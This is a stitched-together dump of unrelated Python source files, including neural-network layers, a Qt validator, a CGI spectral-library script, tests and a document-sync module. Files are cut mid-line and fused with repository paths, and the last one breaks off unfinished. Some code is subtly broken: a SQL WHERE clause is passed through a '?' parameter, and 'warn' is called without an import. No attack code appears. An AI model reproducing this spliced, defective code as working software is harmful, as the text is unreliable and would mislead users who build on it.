GTA_CONTENT_PUBK_RES = 15 def gtMakeGTABlobMsg(bodyTXT, fromTXT='API'): """ Assemble a GTA compatible message blob (suitable for feeding to gtMakeAPIMsg() ) """ blob = (tlvPack(MSGB_TLV_TYPE, "%d" % GTA_CONTENT_TEXT) + tlvPack(MSGB_TLV_NICK, fromTXT) + tlvPack(MSGB_TLV_TEXT, bodyTXT)) # append CRC and return return blob + pack("!H", crc(blob)) def gtReadGTABlob(blob): """ Break down a GTA message blob into its elements """ msg = {} # there's a CRC16 field at the end of the content blob; # check this first and stop if incorrect wantCRC = unpack('!H', blob[-2:])[0] haveCRC = crc(blob[:-2]) if wantCRC != haveCRC: print("CRC failed, want=%04x, have=%04x" % (wantCRC, haveCRC)) return False for type, length, value in tlvRead(blob[:-2]): msg[type] = value # Check for mandatory subelement MSGB_TLV_TYPE if MSGB_TLV_TYPE in msg: return msg return False 
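# Hedged usage sketch (added for illustration, not part of the original pyGT module):
# round-trips a text message through the two helpers above. The literal message text,
# the nick "alice" and the __main__ guard are assumptions; MSGB_TLV_NICK / MSGB_TLV_TEXT
# come from gtdefs via the wildcard import, and gtReadGTABlob returns False when the
# trailing CRC16 does not verify.
if __name__ == '__main__':
    demo_blob = gtMakeGTABlobMsg("hello mesh", fromTXT="alice")  # build blob with trailing CRC16
    parsed = gtReadGTABlob(demo_blob)                            # dict of TLV id -> value, or False
    if parsed:
        print("nick:", parsed.get(MSGB_TLV_NICK))
        print("text:", parsed.get(MSGB_TLV_TEXT))
    else:
        print("CRC check failed")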
phil65/PrettyQtprettyqt/gui/intvalidator.py from __future__ import annotations from prettyqt import gui from prettyqt.qt import QtGui QtGui.QIntValidator.__bases__ = (gui.Validator,) class IntValidator(QtGui.QIntValidator): def __repr__(self): return f"{type(self).__name__}({self.bottom()}, {self.top()})" def __getstate__(self): return dict(bottom=self.bottom(), top=self.top()) def __reduce__(self): return type(self), (self.bottom(), self.top()), None def __eq__(self, other: object): if not isinstance(other, type(self)): return False return self.bottom() == other.bottom() and self.top() == other.top() def set_range(self, lower: int | None, upper: int | None): if lower is None: lower = 2147483647 # number from docs if upper is None: upper = 2147483647 self.setRange(lower, upper) if __name__ == "__main__": val = IntValidator() val.setRange(0, 9) protein-bioinformatics/STAMPSadmin/scripts/curate-spectral-library.py #!/usr/bin/python3 import sqlite3 from cgi import FieldStorage import json conf = {} with open("../qsdb.conf", mode="rt") as fl: for line in fl: line = line.strip().strip(" ") if len(line) < 1 or line[0] == "#": continue token = line.split("=") if len(token) < 2: continue conf[token[0].strip(" ")] = token[1].strip(" ") print("Content-Type: text/html") print() form, action, species = None, None, None try: form = FieldStorage() action = form.getvalue('action') species = form.getvalue('species') except: print(-1) exit() if type(action) is not str or action not in ["count", "select", "update"]: print(-2) exit() spectral_lib = "%s/data/spectral_library_%s.blib" % (conf["root_path"], species) db = sqlite3.connect(spectral_lib) cur = db.cursor() if action == "count": cur.execute('SELECT count(*) cnt FROM RefSpectra;') print(cur.fetchone()[0]) elif action == "select": only_disabled = "onlyDisabled" in form and form.getvalue("onlyDisabled") == "true" limit = form.getvalue('limit') if type(limit) is not str: print(-3) exit() limits = limit.split(",") for l in limits: try: a = int(l) except: print(-4) exit() sql_query = "SELECT id, peptideModSeq, precursorCharge, scoreType FROM RefSpectra ? ORDER BY id LIMIT ?;" cur.execute(sql_query, ("WHERE scoreType = -1" if only_disabled else "", limit)) print(json.dumps([row for row in cur])) elif action == "update": e_id = form.getvalue('id').replace(",", "").replace("\"", "") value = form.getvalue('value').replace(",", "").replace("\"", "") try: a = int(e_id) a = int(value) except Exception as e: print(-5) exit() try: sql_query = "UPDATE RefSpectra SET scoreType = ? WHERE id = ?;" cur.execute(sql_query, (value, e_id)) db.commit() except Exception as e: print(-6) exit() print(0) import math import numpy as np import torch from torch import nn import torch.nn.functional as F from ..registry import NECKS from ..utils import ConvModule from mmcv.cnn import xavier_init class Identity(nn.Module): def __init__(self): super(Identity, self).__init__() def forward(self, x): return x def fill_up_weights(up): w = up.weight.data f = math.ceil(w.size(2) / 2) c = (2 * f - 1 - f % 2) / (2. 
* f) for i in range(w.size(2)): for j in range(w.size(3)): w[0, 0, i, j] = \ (1 - math.fabs(i / f - c)) * (1 - math.fabs(j / f - c)) for c in range(1, w.size(0)): w[c, 0, :, :] = w[0, 0, :, :] class IDAUp(nn.Module): def __init__(self, node_kernel, out_dim, channels, up_factors, conv_cfg=None, norm_cfg=None, activation='relu'): super(IDAUp, self).__init__() self.channels = channels self.out_dim = out_dim for i, c in enumerate(channels): if c == out_dim: proj = Identity() else: proj = ConvModule( c, out_dim, kernel_size=1, stride=1, conv_cfg=conv_cfg, norm_cfg=norm_cfg, activation=activation) f = int(up_factors[i]) if f == 1: up = Identity() else: up = nn.ConvTranspose2d( out_dim, out_dim, f * 2, stride=f, padding=f // 2, output_padding=0, groups=out_dim, bias=False) fill_up_weights(up) setattr(self, 'proj_' + str(i), proj) setattr(self, 'up_' + str(i), up) for i in range(1, len(channels)): node = ConvModule( out_dim * 2, out_dim, kernel_size=node_kernel, stride=1, padding=node_kernel // 2, conv_cfg=conv_cfg, norm_cfg=norm_cfg, activation=activation) setattr(self, 'node_' + str(i), node) for m in self.modules(): classname = m.__class__.__name__ if isinstance(m, nn.Conv2d): m.weight.data.normal_(0, 0.02) elif classname.find('BatchNorm') != -1: m.weight.data.fill_(1) m.bias.data.zero_() def forward(self, layers): assert len(self.channels) == len(layers), \ '{} vs {} layers'.format(len(self.channels), len(layers)) layers = list(layers) for i, l in enumerate(layers): upsample = getattr(self, 'up_' + str(i)) project = getattr(self, 'proj_' + str(i)) layers[i] = upsample(project(l)) x = layers[0] y = [] for i in range(1, len(layers)): node = getattr(self, 'node_' + str(i)) x = node(torch.cat([x, layers[i]], 1)) y.append(x) return x, y @NECKS.register_module class DLAUp(nn.Module): def __init__(self, channels, scales=(1, 2, 4, 8), in_channels=None, num_outs=4, conv_cfg=None, norm_cfg=None, activation='relu'): super(DLAUp, self).__init__() if in_channels is None: in_channels = channels self.channels = channels channels = list(channels) scales = np.array(scales, dtype=int) self.last_conv = ConvModule( in_channels[-1], channels[-1], 1, conv_cfg=conv_cfg, norm_cfg=norm_cfg, activation=activation) self.num_outs = num_outs for i in range(len(channels) - 1): j = -i - 2 setattr( self, 'ida_{}'.format(i), IDAUp(3, channels[j], in_channels[j:], scales[j:] // scales[j])) scales[j + 1:] = scales[j] in_channels[j + 1:] = [channels[j] for _ in channels[j + 1:]] # default init_weights for conv(msra) and norm in ConvModule def init_weights(self): for m in self.modules(): if isinstance(m, nn.Conv2d): xavier_init(m, distribution='uniform') def forward(self, layers): layers = list(layers) assert len(layers) > 1 ms_feat = [layers[-1]] for i in range(len(layers) - 1): ida = getattr(self, 'ida_{}'.format(i)) x, y = ida(layers[-i - 2:]) # y : aggregation nodes layers[-i - 1:] = y ms_feat.append(x) ms_feat = ms_feat[::-1] ms_feat[-1] = self.last_conv(ms_feat[-1]) if self.num_outs > len(ms_feat): ms_feat.append(F.max_pool2d(ms_feat[-1], 1, stride=2)) return ms_feat # x from helpers.b64 import base64_dict, base64_str from helpers.json import json_responenoralsydmp/icetea # pylint: disable=missing-docstring,redundant-unittest-assert """ Copyright 2017 ARM Limited Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. 
You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import unittest import mock import icetea_lib.tools.asserts as asserts from icetea_lib.TestStepError import TestStepFail class MockBench(object): def __init__(self): pass def command(self): pass def logger(self): pass class AssertTestcase(unittest.TestCase): def setUp(self): self.asserts = asserts def test_assert_booleans(self): with self.assertRaises(TestStepFail): self.asserts.assertTrue(False, "False was not True!") with self.assertRaises(TestStepFail): self.asserts.assertFalse(True) try: self.asserts.assertTrue(True, "True was somehow False?!") self.asserts.assertTrue([1, 2]) self.assertTrue(True, "No fail was raised.") except TestStepFail: self.assertTrue(False, "TestStepFail was raised! ") try: self.asserts.assertFalse(False) self.asserts.assertFalse([]) self.asserts.assertFalse({}) self.assertTrue(True, "No fail was raised.") except TestStepFail: self.assertTrue(False, "TestStepFail was raised! ") def test_assert_nones(self): with self.assertRaises(TestStepFail): self.asserts.assertNone(1) with self.assertRaises(TestStepFail): self.asserts.assertNotNone(None) try: self.asserts.assertNone(None) self.asserts.assertNotNone(1) except TestStepFail: self.assertTrue(False, "TestStepFail was raised!") def test_assert_equals(self): with self.assertRaises(TestStepFail): self.asserts.assertEqual(1, 2) with self.assertRaises(TestStepFail): self.asserts.assertNotEqual(1, 1) try: self.asserts.assertEqual(1, 1) self.asserts.assertNotEqual(1, 2) except TestStepFail: self.assertTrue(False, "TestStepFail was raised!") def test_assert_json_contains(self): with self.assertRaises(TestStepFail): self.asserts.assertJsonContains('{"test": "key"}', "test2") with self.assertRaises(TestStepFail): self.asserts.assertJsonContains("{'test': 'key'}", "test") with self.assertRaises(TestStepFail): self.asserts.assertJsonContains(None, "test") try: self.asserts.assertJsonContains('{"test": "key"}', 'test') except TestStepFail: self.assertTrue(False, 'Key test was not contained in {"test": "key"}?') def test_assert_dut_trace_contains(self): mock_bench = mock.MagicMock() mock_bench.verify_trace = mock.MagicMock(side_effect=[True, False]) self.asserts.assertDutTraceContains(1, "message_found", mock_bench) with self.assertRaises(TestStepFail): self.asserts.assertDutTraceContains(1, "message_not_found", mock_bench) def test_assert_dut_trace_does_not_contain(self): # pylint: disable=invalid-name mock_bench = mock.MagicMock() mock_bench.verify_trace = mock.MagicMock(side_effect=[True, False]) with self.assertRaises(TestStepFail): self.asserts.assertDutTraceDoesNotContain(1, "message_found", mock_bench) self.asserts.assertDutTraceDoesNotContain(1, "message_not_found", mock_bench) if __name__ == '__main__': unittest.main() import torch.nn as nn import torch.nn.functional as F import torch class BaseNet(nn.Module): """ Must be used and """ def __init__(self, ForwardLayers, **kwargs): """ param num_layers: An integer, number of layers param num_channels: An integer, number of layers :param ForwardLayers: The class object constructor, not an instance!!! 
Internally called to instantiate network Must extend from ForwardLayersBase :param Loss: Simply the Loss class constructor inside Loss.py, no other Loss mechanism is implemented yet. :param confidence_penalty: :param super_resolution_factor: :param kwargs: """ super(BaseNet, self).__init__() self.forward_net = ForwardLayers(**kwargs) # def forward(self, input, desired_output, root_weight, root_weight_map, **kwargs): def forward(self, input, **kwargs): net_output, before_sigmoid = self.forward_net(input, **kwargs) return net_output, before_sigmoid def calculate_shape_decreases_3D_Net(self, input_crop_size): """ Calculate the shape decrease between the output and input image This decrease is not dependent on input size, but only on network structure :param input_crop_size: should be a list of crop side lengths, with the order in x,y,z :return: """ cropsize_x, cropsize_y, cropsize_z = input_crop_size input_crop = torch.ones((1, cropsize_z, cropsize_x, cropsize_y)) net_output, _ = self.forward_net(input_crop) _, outsize_z, outsize_y, outsize_x = net_output.size() # #debugging # print("input shape:", input_crop.size()) # print("output shape:", net_output.size()) # outsize_z = int(outsize_z/self.super_resolution_factor) # outsize_y = int(outsize_y/self.super_resolution_factor) # outsize_x = int(outsize_x/self.super_resolution_factor) return cropsize_x-outsize_x, cropsize_y-outsize_y, cropsize_z-outsize_z class ForwardLayersBase(nn.Module): def __init__(self, **kwargs): """ Must be implemented in the subclass, you put whatever your network uses (convolutional layers etc.) into this class. :param num_layers: :param num_channels: :param super_resolution_factor: """ super(ForwardLayersBase, self).__init__() pass def forward(self, x, **kwargs): """ Must be implemented in the subclass :param x: the input to the network, volume mapped to RGB :param kwargs: if the network uses additional information, they can be provided inside kwargs :return: the network before and after sigmoid function """ pass import turtle turtle.pencolor("blue") turtle.pensize(3) #THICC turtle.fillcolor("yellow") turtle.begin_fill() turtle.setheading(360) for n in range (8): turtle.forward(50) turtle.right(45) turtle.end_fill() from tensorflow.keras import layers import tensorflow.keras.backend as K # Octave Convolution Layer class OctConv2D(layers.Layer): """ Define the OctConv2D which can replace the Conv2D layer. Paper: Drop an Octave: Reducing Spatial Redundancy in Convolutional Neural Networks with Octave Convolution. 
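# --- Illustrative sketch (not part of BaseNet): the "shape decrease" probe that
# calculate_shape_decreases_3D_Net performs above, shown on a toy unpadded conv
# stack. The network and crop sizes here are arbitrary.
import torch
import torch.nn as nn

net = nn.Sequential(nn.Conv3d(1, 8, 3), nn.ReLU(), nn.Conv3d(8, 1, 3))
crop_x, crop_y, crop_z = 32, 32, 16
dummy = torch.ones((1, 1, crop_z, crop_y, crop_x))
with torch.no_grad():
    out = net(dummy)
_, _, out_z, out_y, out_x = out.shape
# The decrease depends only on the architecture, not on the crop size.
print(crop_x - out_x, crop_y - out_y, crop_z - out_z)  # 4 4 4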
(2019) """ def __init__(self, filters, alpha, kernel_size=(3, 3), strides=(1, 1), padding="same", kernel_initializer='glorot_uniform', kernel_regularizer=None, kernel_constraint=None, **kwargs): """ :param filters: # output channels for low + high :param alpha: Low to high channels ratio (alpha=0 -> High channels only, alpha=1 -> Low channels only) :param kernel_size: 3x3 by default :param strides: 1x1 by default :param padding: "same" by default :param kernel_initializer: "glorot_uniform" by default :param kernel_regularizer: "None" by default, you can specify one :param kernel_constraint: "None" by default, you can specify one :param kwargs: other keyword arguments """ assert 0 <= alpha <= 1 assert filters > 0 and isinstance(filters, int) super().__init__(**kwargs) # required arguments self.alpha = alpha self.filters = filters # optional arguments self.kernel_size = kernel_size self.strides = strides self.padding = padding self.kernel_initializer = kernel_initializer self.kernel_regularizer = kernel_regularizer self.kernel_constraint = kernel_constraint # Low Channels self.low_channels = int(self.filters * self.alpha) # High Channels self.high_channels = self.filters - self.low_channels def build(self, input_shape): assert len(input_shape) == 2 assert len(input_shape[0]) == 4 and len(input_shape[1]) == 4 # assertion for high channel inputs assert input_shape[0][1] // 2 >= self.kernel_size[0] assert input_shape[0][2] // 2 >= self.kernel_size[1] # assertion for low channel inputs assert input_shape[0][1] // input_shape[1][1] == 2 assert input_shape[0][2] // input_shape[1][2] == 2 # "channels last" format for TensorFlow assert K.image_data_format() == "channels_last" # input channels high_in = int(input_shape[0][3]) low_in = int(input_shape[1][3]) # High Channels -> High Channels self.high_to_high_kernel = self.add_weight(name="high_to_high_kernel", shape=(*self.kernel_size, high_in, self.high_channels), initializer=self.kernel_initializer, regularizer=self.kernel_regularizer, constraint=self.kernel_constraint) # High Channels -> Low Channels self.high_to_low_kernel = self.add_weight(name="high_to_low_kernel", shape=(*self.kernel_size, high_in, self.low_channels), initializer=self.kernel_initializer, regularizer=self.kernel_regularizer, constraint=self.kernel_constraint) # Low Channels -> High Channels self.low_to_high_kernel = self.add_weight(name="low_to_high_kernel", shape=(*self.kernel_size, low_in, self.high_channels), initializer=self.kernel_initializer, regularizer=self.kernel_regularizer, constraint=self.kernel_constraint) # Low Channels -> Low Channels self.low_to_low_kernel = self.add_weight(name="low_to_low_kernel", shape=(*self.kernel_size, low_in, self.low_channels), initializer=self.kernel_initializer, regularizer=self.kernel_regularizer, constraint=self.kernel_constraint) super().build(input_shape) def call(self, inputs): # Input = [X^H, X^L] assert len(inputs) == 2 high_input, low_input = inputs # Convolution: High Channels -> High Channels high_to_high = K.conv2d(high_input, self.high_to_high_kernel, strides=self.strides, padding=self.padding, data_format="channels_last") # Convolution: High Channels -> Low Channels high_to_low = K.pool2d(high_input, (2, 2), strides=(2, 2), pool_mode="avg") high_to_low = K.conv2d(high_to_low, self.high_to_low_kernel, strides=self.strides, padding=self.padding, data_format="channels_last") # Convolution: Low Channels -> High Channels low_to_high = K.conv2d(low_input, self.low_to_high_kernel, strides=self.strides, padding=self.padding, 
data_format="channels_last") low_to_high = K.repeat_elements(low_to_high, 2, axis=1) # Nearest Neighbor Upsampling low_to_high = K.repeat_elements(low_to_high, 2, axis=2) # Convolution: Low Channels -> Low Channels low_to_low = K.conv2d(low_input, self.low_to_low_kernel, strides=self.strides, padding=self.padding, data_format="channels_last") # Cross Add high_add = high_to_high + low_to_high low_add = high_to_low + low_to_low return [high_add, low_add] def compute_output_shape(self, input_shapes): high_in_shape, low_in_shape = input_shapes high_out_shape = (*high_in_shape[:3], self.high_channels) low_out_shape = (*low_in_shape[:3], self.low_channels) return [high_out_shape, low_out_shape] def get_config(self): base_config = super().get_config() out_config = { **base_config, "filters": self.filters, "alpha": self.alpha, "kernel_size": self.kernel_size, "strides": self.strides, "padding": self.padding, "kernel_initializer": self.kernel_initializer, "kernel_regularizer": self.kernel_regularizer, "kernel_constraint": self.kernel_constraint, } return out_config import collections import itertools def data(settings) -> str: """ Impute name of field containing base64 encoded data. Parameters ---------- settings : typing.Dict YAML parsed to dict Returns ------- str: "name_of_data_field" """ return '"' + settings["input"]["name"] + '"' def fields(settings) -> str: """ Impute name of fields (if any) specifying tensor shape during request. Fields can be empty if tensor shape is known beforehand (STATIC macro defined, see `header.static` function). Parameters ---------- settings : typing.Dict YAML parsed to dict Returns ------- str: "field1", "field2", ..., "fieldN" """ return ", ".join( [ '"' + field + '"' for field in settings["input"]["shape"] if isinstance(field, str) ] ) def data_type(settings) -> str: type_mapping = { "base64": "", "byte": "uint8_t", "char": "int8_t", "short": "int16_t", "int": "int32_t", "long": "int64_t", "float": "float", "double": "double", } return type_mapping[settings["input"]["type"]] def data_func(settings) -> str: type_mapping = { "base64": "", "byte": "Integer", "char": "Integer", "short": "Integer", "int": "Integer", "long": "Int64", "float": "Double", "double": "Double", } return "As" + type_mapping[settings["input"]["type"]] def normalize(settings, key: str) -> str: """ Impute normalization values if any. Parameters ---------- settings : typing.Dict YAML parsed to dict key : str Name of YAML settings field (either means or stddevs) to be imputed Returns ------- str: "" or "value1, value2, value3" """ if settings["normalize"] is None: return "" return ", ".join(map(str, settings["normalize"][key])) def torch_data_type(settings): type_mapping = { "base64": "torch::kUInt8", "byte": "torch::kUInt8", "char": "torch::kInt8", "short": "torch::kInt16", "int": "torch::kInt32", "long": "torch::kInt64", "float": "torch::kFloat32", "double": "torch::kFloat64", } return type_mapping[settings["input"]["type"]] def inputs(settings) -> str: """ Impute input shapes. Shapes may be name of fields passed during request (dynamic input shape) or integers (static input shape) or mix of both. If field is a name (string), it will be transformed to `json_view.GetInteger(name)`. 
Parameters ---------- settings : typing.Dict YAML parsed to dict Returns ------- str: String like "1, 3, json_view.GetInteger("width"), json_view.GetInteger("height")" """ return ", ".join( str(elem) if isinstance(elem, int) else 'json_view.GetInteger("{}")'.format(elem) for elem in settings["input"]["shape"] ) def aws_to_torch(settings, key: str) -> str: """ Impute libtorch specific type from user provided "human-readable" form. See `type_mapping` in source code for exact mapping. Parameters ---------- settings : typing.Dict YAML parsed to dict Returns ------- str: String specifying type, e.g. "torch::kFloat16" """ type_mapping = { "bool": "torch::kInt8", "int": "torch::kInt32", "long": "torch::kInt64", "double": "torch::kFloat64", } if settings["return"][key] is None: return "" return type_mapping[settings["return"][key]["type"].lower()] def torch_approximation(settings, key: str) -> str: """ PyTorch has no `bool` type in libtorch hence we approximate one. Each item will be later static_casted to appropriate type if needed, which is essentially a no-op for for already correct types. Usually only `bool` will be casted (eventually other "hard-types" if the architecture is specific). Parameters ---------- settings : typing.Dict YAML parsed to dict Returns ------- str: String specifying type, e.g. "int8_t" """ type_mapping = { "bool": "int8_t", "int": "int32_t", "long": "int64_t", "double": "double", } if settings["return"][key] is None: return "" return type_mapping[settings["return"][key]["type"].lower()] def operations_and_arguments(settings): """ If return->result specified get names of operations to apply on output tensor. Merges return->result->operations and return->result->arguments into single string to input. return ->result->operations is required. Names of operations or arguments isn't verified and it may result in compilation error if user specifies unavailable tensor function. Current weak point in design, check if it can be improved and "safer". Parameters ---------- settings : typing.Dict YAML parsed to dict Returns ------- str: string representation of number, e.g. "255.0" """ def _add_namespace(operation): return "torch::{}".format(operation) def _operation_with_arguments(operation, *values): return "{}({})".format( _add_namespace(operation), ",".join(map(str, [value for value in values if value])), ) def _no_arguments_multiple_operations(operations): output = _operation_with_arguments(operations[0], "output") for operation in operations[1:]: output = _operation_with_arguments(operation, output) return output def _wrap_in_list(value): if not isinstance(value, list): return [value] return value if settings["return"]["result"] is None: return "" if "code" in settings["return"]["result"]: return settings["return"]["result"]["code"] operations = settings["return"]["result"]["operations"] arguments = settings["return"]["result"]["arguments"] if arguments is None: if isinstance(operations, str): return "{}(output)".format(_add_namespace(operations)) return _no_arguments_multiple_operations(operations) operations, arguments = _wrap_in_list(operations), _wrap_in_list(arguments) output = _operation_with_arguments(operations[0], "output", arguments[0]) for operation, argument in itertools.zip_longest(operations[1:], arguments[1:]): output = _operation_with_arguments(operation, output, argument) return output def aws_function(settings, key: str, array: bool) -> str: """ Internal imputation specifying one of AWS SDK functions based on type. 
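# --- Illustrative call (not from the original module) showing what
# operations_and_arguments above produces for a typical settings dict; the
# expected string is traced by hand from the helper's logic.
settings = {
    "return": {
        "result": {
            "operations": ["softmax", "argmax"],  # applied left to right
            "arguments": [1, None],               # optional argument per operation
        }
    }
}
print(operations_and_arguments(settings))
# -> torch::argmax(torch::softmax(output,1))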
This function specifies which AWS SDK function will be used to create JSONValue (either as single item to return or as part of array to return). Looked for in return->output and return->result settings and returns one or both depending on which is specified. Parameters ---------- settings : typing.Dict YAML parsed to dict key : str Name of field to look for in type (either "output" or "result") array: bool Whether prefix should be tailored to array output (`As`) or item (`With`) Returns ------- str: "" or "As" or "With" AWS function name """ prefix = "As" if array else "With" type_mapping = { "int": "Integer", "long": "Int64", "double": "Double", } if settings["return"][key] is None: return "" return prefix + type_mapping[settings["return"][key]["type"].lower()] def field_if_exists(settings, key: str, name: str) -> str: """ Return value of nested fields if those are specified. Parameters ---------- settings : typing.Dict YAML parsed to dict key : str Name of field to look for in type (either "output" or "result") name: str Name of field to look for in one of "output" or "result" Returns ------- str: "" or value provided in field """ if settings["return"][key] is None: return "" return settings["return"][key][name] def model(settings) -> str: """ Return path to model specified by settings. Parameters ---------- settings : typing.Dict YAML parsed to dict Returns ------- str: "/path/to/model" """ return '"' + settings["model"] + '"' import os from glob import glob from process_for_manuscript import all_kinder_plates, all_manuscript_plates def check_missing_outliers(): all_plates = all_kinder_plates() + all_manuscript_plates() outlier_pattern = '../../misc/tagged_outliers/*.csv' outlier_plates = glob(outlier_pattern) outlier_plates = [os.path.split(plate)[1] for plate in outlier_plates] outlier_plates = [plate[:plate.find('_tagger')] for plate in outlier_plates] missing_plates = list(set(all_plates) - set(outlier_plates)) missing_plates.sort() print("Missing tagged outliers") print("\n".join(missing_plates)) if __name__ == '__main__': check_missing_outliers() paulfanelli/planet_alignment """ .. module:: app :platform: linux :synopsis: The module containing the planet alignment application. .. moduleauthor:: <> .. modulecreated:: 6/27/15 """ from zope.interface import implements from planet_alignment.app.interface import IApp class App(object): """This class houses the main application and runs the planet alignment. - **parameters** and **types**:: :param system_data: The system data object containing planet alignment data. :param plugins_mgr: The plugins manager object containing a list of plugins. :param time: The amount of time to calculate the alignment for. :type system_data: SystemData object. :type plugins_mgr: PluginsManager object. :type time: float """ implements(IApp) def __init__(self, system_data, plugins_mgr, time): self._system_data = system_data self._plugins_mgr = plugins_mgr self._time = time def run(self): """Runs the planet alignment algorithm. :return: Returns a list of results, if there are any, else an empty list. 
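# --- Hypothetical plugin sketch (not part of the original package) for the App.run
# loop above: are_planets_aligned is the only method the loop requires. The planet
# attributes used here (theta_init, period) are assumptions for illustration.
class SimpleAlignmentPlugin(object):
    def are_planets_aligned(self, p1, p2, time):
        a1 = (p1.theta_init + 360.0 * time / p1.period) % 360.0
        a2 = (p2.theta_init + 360.0 * time / p2.period) % 360.0
        diff = abs(a1 - a2)
        return min(diff, 360.0 - diff) < 1.0  # within one degree of each other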
:rtype: list """ result_retval = [] for plugin_path in self._plugins_mgr: try: plugin_inst = self._plugins_mgr.get_plugin_instance_by_path(plugin_path) plugin_name = self._plugins_mgr.get_plugin_name_by_path(plugin_path) except (KeyError, AttributeError) as e: print("WARNING: {}".format(e)) continue plugin_str = '' unique_aligned_list = [] first_entry = True for x in self._system_data: aligned_list = [] for y in self._system_data: # don't compare the planets to themselves if x.name == y.name: continue try: result = plugin_inst.are_planets_aligned(x, y, self._time) if result: if x.name not in aligned_list: aligned_list.append(x.name) aligned_list.append(y.name) aligned_list.sort() except AttributeError as ae: print("ERROR: {}: {}".format(plugin_path, ae)) except Exception as e: print("ERROR: Unknown error {}".format(e)) if aligned_list: if aligned_list not in unique_aligned_list: unique_aligned_list.append(aligned_list) for unique_aligned_entry in unique_aligned_list: if first_entry: first_entry = False else: plugin_str += '\n' plugin_str += plugin_name + ': ' + ', '.join(unique_aligned_entry) if plugin_str: result_retval.append(plugin_str) return result_retval def print_results(self, results): """Prints the results from the run of the planet alignment algorithm. :param results: List of the results output data. :type results: list :return: Returns the self reference. :rtype: App class. """ for line in results: print(line) return self import emlib """ Example 4. Lotka Volterra Validation ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ """ def LV3_int(t,initial,dtinput,constants): x = initial[0] y = initial[1] A = constants.Val("A") B = constants.Val("B") C = constants.Val("C") D = constants.Val("D") x_dot = (A * x) - (B * x *y) y_dot = (D * x * y) - (C * y) return [x_dot, y_dot] hares = emlib.Observation("Hares",filename="LVdata.csv") LVmodel = emlib.Model(LV3_int) LVBEST = emlib.Calibration() LVBEST.Add("A",val=.5) LVBEST.Add("B",val=.02) LVBEST.Add("C",val=.9) LVBEST.Add("D",val=.03) LVBEST.initial = [30.0,4.0] LVtime = emlib.TimeSeries(filename="LVinput.csv") LVmodel.Integrate(LVBEST.initial,Calibration=LVBEST,TimeSeries=LVtime,dt=(1.0/12.0)) LVmodel.Validate(hares,graph=True) 0 """Tools for document storgage.""" import os import shutil from xonsh.lib import subprocess from contextlib import contextmanager try: import hglib except: hglib = None def find_store(rc): if getattr(rc, "storename", None) is None and len(rc.stores) != 0: return rc.stores[0] for store in rc.stores: if store["name"] == rc.storename: return store else: msg = "Could not find the store {0!r}".format(rc.storename) raise RuntimeError(msg) def storage_path(store, rc): """Computes the storage directory.""" name, url = store["name"], store["url"] for db in rc.databases: if db["name"] == name and db["url"] == url: path = os.path.join(rc.builddir, "_dbs", name, store["path"]) break else: path = os.path.join(rc.builddir, "_stores", name, store["path"]) os.makedirs(path, exist_ok=True) return path def sync_git(store, path): """Syncs the local documents via git.""" storedir, _ = os.path.split(path) # get or update the storage if os.path.isdir(storedir): cmd = ["git", "pull"] cwd = storedir else: cmd = ["git", "clone", store["url"], storedir] cwd = None subprocess.check_call(cmd, cwd=cwd) def sync_hg(store, path): """Syncs the local documents via hg.""" storedir, _ = os.path.split(path) # get or update the storage if os.path.isdir(os.path.join(storedir, ".hg")): client = hglib.open(storedir) client.pull(update=True, force=True) else: # 
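# --- Stand-alone check (not from the original example) of the Lotka-Volterra
# right-hand side LV3_int above, integrated with scipy instead of emlib, using the
# same constants and initial populations as LVBEST.
import numpy as np
from scipy.integrate import solve_ivp

A, B, C, D = 0.5, 0.02, 0.9, 0.03

def lv(t, state):
    x, y = state                       # prey, predator
    return [A * x - B * x * y,         # prey growth minus predation
            D * x * y - C * y]         # predation gain minus predator mortality

sol = solve_ivp(lv, (0.0, 50.0), [30.0, 4.0], t_eval=np.linspace(0.0, 50.0, 601))
print(sol.y[:, -1])                    # populations at t = 50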
Strip off three characters for hg+ client = hglib.clone(store["url"][3:], storedir) def sync(store, path): """Syncs the local documents.""" url = store["url"] if url.startswith("git") or url.endswith(".git"): sync_git(store, path) elif url.startswith("hg+"): sync_hg(store, path) elif not os.path.exists(os.path.expanduser(url)): raise ValueError("Do not know how to sync this kind of storage.") def copydocs(store, path, rc): """Copies files to the staging area.""" for doc in rc.documents: dst = os.path.join(path, os.path.split(doc)[1]) if not rc.force and os.path.isfile(dst): raise RuntimeError(dst + " already exists!") shutil.copy2(doc, dst) def push_git(store, path): """Pushes the local documents via git.""" storedir, _ = os.path.split(path) cmd = ["git", "add", "."] subprocess.check_call(cmd, cwd=storedir) cmd = ["git", "commit", "-m", "regolith auto-store commit"] try: subprocess.check_call(cmd, cwd=storedir) except subprocess.CalledProcessError: warn("Could not git commit to " + storedir, RuntimeWarning) return cmd = ["git", "push"] try: subprocess.check_call(cmd, cwd=storedir) except subprocess.CalledProcessError: warn("Could not git push from " + storedir, RuntimeWarning) return def push_hg(store, path): """Pushes the local documents via git.""" storedir, _ = os.path.split(path) client = hglib.open(storedir) if len(client.status(modified=True, unknown=True, added=True)) == 0: return client.commit(message="regolith auto-commit", addremove=True) client.push() def push(store, path): """Pushes the local documents.""" url = store["url"] if url.startswith("git") or url.endswith(".git"): push_git(store, path) elif url.startswith("hg+"): push_hg(store, path) elif not os.path.exists(os.path.expanduser(url)): raise ValueError("Do not know how to push to this kind of storage.") class StorageClient(object): """Interface to the storage system""" def __init__(self, rc, store, path): self.rc = rc self.store = store self.path = path def copydoc(self, doc): """Copies file to the staging area.""" dst = os.path.join(self.path, os.path.split(doc)[1]) if not self.rc.force and os.path.isfile(dst): raise RuntimeError(dst + " already exists!") shutil.copy2(doc, dst) return dst def retrieve(self, file_name): """Get file from the store Parameters ---------- file_name : name of the file Returns ------- path : str or None The path, if the file is not in the store None """ ret = os.path.join(self.path, file_name) if os.path.exists(ret): return os.path.join(self.path, file_name) else: return None @contextmanager def store_client(rc): """Context manager for file storage Parameters ---------- rc : RunControl Yields ------- client : StorageClient The StorageClient instance """ store = find_store(rc) path = storage_path(store, rc) sync(store, path) yield StorageClient(rc, store, path) push(store, path) def main(rc): """Copies files into the local storage location and uploads them.""" with store_client(rc) as sclient: for doc in rc.documents: sclient.copydoc(doc) server/audiofire.py import dbus import time import subprocess bus = dbus.SessionBus() dest = 'org.ffado.Control' mixer_object = 